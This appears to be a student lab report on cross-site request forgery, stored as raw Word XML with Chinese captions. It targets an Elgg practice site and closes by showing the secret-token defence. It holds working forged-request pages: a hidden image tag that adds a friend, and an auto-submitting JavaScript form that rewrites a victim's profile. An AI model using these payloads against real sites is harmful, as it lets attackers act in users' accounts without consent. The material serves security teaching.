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点击add-ons，再输入这个插件名字，搜索插件并安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="36099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点击sidebars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3482340"/>
            <wp:effectExtent l="0" t="0" r="952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Get和post</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3987800" cy="4673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0500" cy="469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开始前alice的好友列表为空</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="30861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用其他账号向boby添加好友，我们可以发现boby的friend id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4006850" cy="18986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Bob的id是43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1888490"/>
            <wp:effectExtent l="0" t="0" r="317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&lt;h1&gt;this is a page forges an HTTP GET Request.&lt;/h1&gt;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src="http://www.csrflabelgg.com/action/friends/add?friend=43"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alt="image" width="1" height="1"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登录alice账号进入attacker网页，点击私信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="264858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209169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988695"/>
            <wp:effectExtent l="0" t="0" r="1206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发现alice多了boby好友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攻击之前我们需要知道alice的id通过类似之前的操作，我们通过其他人加alice的好友得到alice的id为42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30650" cy="12001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80565"/>
            <wp:effectExtent l="0" t="0" r="1206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&lt;html&gt;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&lt;body&gt;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&lt;h1&gt;This page forges an HTTP POST request.&lt;/h1&gt;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&lt;script type="text/javascript"&gt;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function forge_post()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{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var fields;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// The following are form entries need to be filled out by attackers.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// The entries are made hidden, so the victim won’t be able to see them.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fields += "&lt;input type='hidden' name='name' value='Alice'&gt;";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fields += "&lt;input type='hidden' name='description' value='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BOBY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is MY HERO' &gt;";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fields += "&lt;input type='hidden' name='accesslevel[description]' value='2'&gt;";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fields += "&lt;input type='hidden' name='guid' value='42'&gt;";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// Create a &lt;form&gt; element.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var p = document.createElement("form");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// Construct the form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p.action = "http://www.csrflabelgg.com/action/profile/edit";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p.innerHTML = fields;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p.method = "post";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// Append the form to the current page.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 document.body.appendChild(p);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p.submit();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}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// Invoke forge_post() after the page is loaded.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window.onload = function() { forge_post();}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 xml:space="preserve">&lt;/script&gt; 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&lt;/body&gt;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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1888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813300" cy="3124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911225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打开文件修改代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="151193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182370"/>
            <wp:effectExtent l="0" t="0" r="63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50870"/>
            <wp:effectExtent l="0" t="0" r="127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在添加注释之后，开启了Elgg对CSRF的防御措施，重复t</w:t>
      </w:r>
      <w:r>
        <w:t>ask 2 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实验，发现CSRF攻击无效。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因为在网页中嵌入了一个随机的机密值，当请求从该页面发起后，该机密值放在请求中，这些恶意网页不能再跨站请求中包含正确的机密值。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87CDF"/>
    <w:rsid w:val="0220633B"/>
    <w:rsid w:val="03D45DF8"/>
    <w:rsid w:val="03F61B4D"/>
    <w:rsid w:val="07CE2159"/>
    <w:rsid w:val="0A684CED"/>
    <w:rsid w:val="0EBA00F9"/>
    <w:rsid w:val="10DD209B"/>
    <w:rsid w:val="17FB027D"/>
    <w:rsid w:val="18B96829"/>
    <w:rsid w:val="1D425782"/>
    <w:rsid w:val="1E664865"/>
    <w:rsid w:val="21EB5BAA"/>
    <w:rsid w:val="24E97A73"/>
    <w:rsid w:val="289B35AC"/>
    <w:rsid w:val="2B8637AC"/>
    <w:rsid w:val="2FDD2A95"/>
    <w:rsid w:val="37A17E18"/>
    <w:rsid w:val="3C8B4486"/>
    <w:rsid w:val="42FC24D9"/>
    <w:rsid w:val="44181540"/>
    <w:rsid w:val="474226E4"/>
    <w:rsid w:val="4F901AB9"/>
    <w:rsid w:val="54303313"/>
    <w:rsid w:val="5AB45F11"/>
    <w:rsid w:val="5DAE28C5"/>
    <w:rsid w:val="60496041"/>
    <w:rsid w:val="616E581B"/>
    <w:rsid w:val="663273F7"/>
    <w:rsid w:val="6BBA512D"/>
    <w:rsid w:val="6D731355"/>
    <w:rsid w:val="6FB7670B"/>
    <w:rsid w:val="736135E6"/>
    <w:rsid w:val="76892F7B"/>
    <w:rsid w:val="791F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2020-09-14T01:59:54Z</dcterms:created>
  <dc:creator>123</dc:creator>
  <cp:lastModifiedBy>123</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-14T04:12:30Z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